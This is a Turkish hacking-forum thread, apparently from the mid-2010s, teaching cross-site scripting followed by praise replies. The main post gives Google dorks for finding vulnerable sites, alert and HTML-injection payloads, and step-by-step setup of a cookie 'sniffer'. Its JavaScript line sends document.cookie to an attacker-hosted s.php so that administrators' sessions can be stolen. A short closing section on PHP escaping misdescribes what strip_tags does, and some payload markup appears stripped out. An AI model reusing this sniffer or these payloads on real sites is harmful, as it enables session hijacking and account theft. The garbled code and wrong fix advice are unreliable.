Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
XSS İle İlgili Herşey
#1
XSS

Bahsedeceğim açık 2000 li yıllardan kalma ama halen daha iş gören bir açıktır.

XSS Nedir ?

Web sitelerinde genel olarak input ( veri girdisi ) alanlarında bulunarak güvenlik önlemleri alınmadığı takdirde HTML,JS gibi kodların çalıştırılmasıyla oluşur. Web kullanıcılarına ya da web site yöneticilerine nasıl bir zarar verebilecek örneğinden bahsetmek gerekirse bir web sitenin iletişim bölümündeki input alanına JS kodları ile cookie (çerez) betiği yollandığı taktir de yönetici iletişim bölümünün ilgili sayfasına girdiğinde kod çalışarak kullanıcı bilgileri saldırganın eline düşecektir.

Xss Nasıl Aranır?

Bir Tane Web Sayfası düşünelim arkadaşlar.
news.php,index.php,p.php gibi php dosyaları bulunmakta bu dosyalar içerisinden herhangi bir haber sayfası açalım
id= degeri 10,15 gibi rakamlar belirlenir ve veritabanı içerisinde listelenmiştir. biz bu degerleri kullanarak Xss tespit yapabiliriz.


Xss nerede aranır?

Herkezin bildiği üzere Xss nerede aranır sorusuna ilk önce id degerler içerisinde aranır ama bilinen bir gerçek Xss en popüler olarak bir sayfa içerisinde form’larda aranır.
Peki sarch kutusunda ne yapacagız?
bu search kutusunda Xss arıcaz biz ekrana Acik Bulundu yazdırarak Xss tespit etmek istiyorsak search kutusuna

“>alert(“acik bulundu”)

yazdıgımızda ekrana acik bulundu yazdıracakdır eger Xss mevcut ise alert mesajı gelecekdir.


Xss için dorklar ?

inurl:index.php?id=
inurl:main.php?id=
inurl:news.php=id=

Gibi bunları dahada çoğaltabiliriz.Kısacası dork yazımları size kalmış bişidir.


XSS Türleri

Stored: Arkadaşlar bu açık Ziyaretçi defterlerin de forum tarzı yerler de bulunur, oldukça tehlikelidir. Veriler veritabanına kaydedilir ve her giren kullanıcı XSS saldırısına maruz kalabilir.

Reflected: Stored’in tam tersi, çok tehlikeli değildir. URL alanlarında bulunur, kullanıcılar etkilenmez.

DOM: Bu XSS kodu çok zararlıdır, trojan enjekte edersiniz, index bile değiştirirsiniz. Javascripti zararlı bir şekilde kullanılması süreciyle yapılır.

Xss Sniffer Naıl Uygulanır ?

XSS Açığı Buldum ama Nasıl Uygulayacağım ?
Arkadaşlar XSS Açığı Buldukdan Sonraki Aşamamız Sniffer’a Yazmak ve Kurmak Diyebiliriz..

İnternet Sitesinde XSS Açığı Bulduk Diyelim..
Sniffer’ımızı İndirdik

Hide Post

Hosting’imizi Atmadan Önce 3 Adet Dosya Düzenliyeceğiz.
Editliyeceğimiz Dosyalar ;

logme.php -> Giriş Şifremizin Olduğu Dosya


js1.js -> s.php Dosya Yolu

index.html -> Xss Açığını Bulduğumuz Yeri Yazıyoruz.

İlk Önce logme.php Dosyasını Açıyoruz ;

Açar Açmaz İlk Başda Zaten

Burdaki admin Kullanıcı Adımız Bunu İstediğimiz Gibi Düzeltiyoruz

$ourPassword = “123456″ -> Burdaki 123456 Kullanıcı Şifremiz Bunuda İstediğimiz Gibi Düzeltiyoruz.

Ve Logme.php Dosyamızı Kaydediyoruz.


Sıra Geldi js1.js Dosyamıza Açalım Bu Dosyamızıda

js1.js ;

i=new/**/Image();i.src= “”>http://mysite.com/sniffer/s.php?’+document.cookie

Buraya Hosting’imize Attıkdan Sonraki s.php yolumuzu Belirliyoruz.

Yani Hostumuza Attıkdan Sonra s.php Dosyası Hangi Dizine Geliyorsa Onu Yazıyoruz.

http://www.mysite.com/sniffer/s.php ise

i=new/**/Image();i.src= “”>http://mysite.com/sniffer/s.php?’+document.cookie

Şeklinde Yazıp Kaydediyoruz.
Son Olarakda index.html Dosyasına Geldik, Onuda Açalım

document.write(’’)

index html’de yukarıdaki alanı düzenleyeceğiz.

XSS Açığı Bulduğumuz Yeri ( Örnek : http://www.örnek.com/arama.php?id ) Yazıyoruz ve Bu Şekilde Oluyor ;
document.write(’’)

Daha Sonra ise js1.js Dosyasının Yolunu Belirliyoruz.

Buda Bu Şekilde Oluyor ;

document.write(’’)

ve Kaydediyoruz.

Dosyalarımızı Hosting’imize Atalım. Şimdi chmod Ayarını Yapıcaz.

Data.txt -> chmod Ayarını 777 Yapıyoruz.


Xss HTML İnjection Nasıl Yapılır ?


XSS Açığını Bulacağımız Sayfaya Gelelim

Şöyle Olsun

http://www.website.com/index.php?id=

Buraya html kodlarını yerleştirip enjekte edeceğiz.

Nasıl XSS Kodu Uyguluyorsak

alert(’acik bulundur’)www.website.com/portal/profil.php?id=>alert(’BecKer’)

Aynı Şekildede HTML Kodu Uygulayacağız.

Şimdi Bu Site Üzerinde Bir Upload Şeklinde Birşey Oluşturalım.

Upload Alanı Oluşturcaksan HTML Şeklinde Böyle Oluyor ;

Link bu şekilde olacakdır
http://www.website.com/index.php?id=>;

Xss açığı oldugu zaman sayfada göreceksiniz.

Şimdide Meta atalım.

Kodumuz.

Aynı Yukardaki Şekilde Linkimize Döküyoruz ;

http://www.website.com/index.php?id=>;

Eğer XSS Varsa Aynı Şekilde Sayfa Yönlencektir.

İstediğiniz HTML Kodunu Çalıştırabilirsiniz.



Xss` de Güvenlik

Xss’nin en önemli bölümüdür.
şu yazıma kadar hep atakdan hep zararlı hallerinden bahsettik…

Not: php için yazılmıştır.

Fazla uzatmadan senaryomuza geçelim.

Search arama sayfasında Xss buldugumuzu düşünelim ve fix yönetimini anlatmaya çalışalım.
search arama sayfasında girdiler kullanıcılar tarafından girilir, zararlı kodlar girilmesi halinde Xss tespit edilir.

senaryo şu şekilde
veriyi gir.
ekrana alert ver.
fix’den sonra
veriyi gir.
ekranda bir değişiklik yok (fix çeşitine göre değişir.)

şimdi arama sayfamızın search.php oldugunu düşünelim.

Search.php?go=girilen kelimeler

şeklinde olacaktır.
vede Ekrana, Aranan kelime > Verimizi Arıyoruz..
Koda Baktığımızda Hiç Bir Filtreleme Olmadan,

“.$aranan.”";
?>

direk ekrana vuruyor.

Search.php?go=alert(“BecKer”)

Peki hangi önlemler Alabiliriz?

Kullanacağımız Fonksiyonlar,

# htmlspecialchars();
# strip_tags();

Kullanıcağımız fonksiyonlar değişecek ama filter için gereken önlemler bu kadarda kalmaz bu yazımda 2 çeşit fonksiyon kullanacağım…

# htmlspecialchars();

* ’&’ (ve imi) ’&’ haline gelir.
* ’”’ (çift tırnak) ENT_NOQUOTES belirtilmişse ’"’ haline gelir.
* ’’’ (tek tırnak) ENT_QUOTES belirtilmişse ’’’ haline gelir.
* ’’ (büyüktür) ’>’ haline gelir

Htmlspecialchars ve strip_tag fonksiyonu arasında fark nedir?
Search.php?go=alert(“BecKer”)

burada ekrana yansımaz ama,

Search.php?go=”>alert(“BecKer”)

şeklinde yazdırıldıgında ekrana yansıtılır.

strip_tags fonksiyonu nedir ne işe yarar?
” karakterinin başına \\\\ getirerek bunu önler,

fonksiyon kullanımı…

$aranan = htmlspecialchars($_GET[’go’]);
$aranan = strip_tags($aranan);
echo “aranan kelime > “.$aranan.”";

evet bunun sonunda alert ekran gelmeyecekdir.

Not: Arkadaşım güzel anlatmışsın uğraşmışsın ama ben bişi anlamadım diyosan buyur videoya bak oradan bişiler kapmaya çalış o zaman exciting




Beğenenler: kaandxxd
#2
Eline Sağlık.Alıntı değilse Süper Konu Bence exciting
Beğenenler:
#3
Değil kardeşim sadece videoyu uğraşamadım ama onuda ben yapsaydım iyi olacaktı kiss
Beğenenler:
#4
Afferin Güzel Konu Böyle Konularda Videoda Bile Alıntı Yapma
Sen Çek Paylaş Hem Detayına Kadar ANlatırsın İyice :haha:
Beğenenler:
#5
Teşekkürler
Beğenenler:
#6
Yardımcı olduysam ne mutlu
Beğenenler:
#7
Teşekkürler
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  MD5 Şifre Kırmayla Alakalı Herşey + Videolu Resimli Anlatım KingSkrupellos 7 6,975 12-04-2015, Saat: 17:19
Son Yorum: Mr.DURGUT
  Shell Hakkında Herşey archavin 0 156 18-04-2014, Saat: 17:17
Son Yorum: archavin
Anahtar Kelimeler

XSS İle İlgili Herşey indir, XSS İle İlgili Herşey Videosu, XSS İle İlgili Herşey Online izle, XSS İle İlgili Herşey Bedava indir, XSS İle İlgili Herşey Yükle, XSS İle İlgili Herşey Hakkında, XSS İle İlgili Herşey Nedir, XSS İle İlgili Herşey Free indir, XSS İle İlgili Herşey Oyunu, XSS İle İlgili Herşey Download


1 Ziyaretçi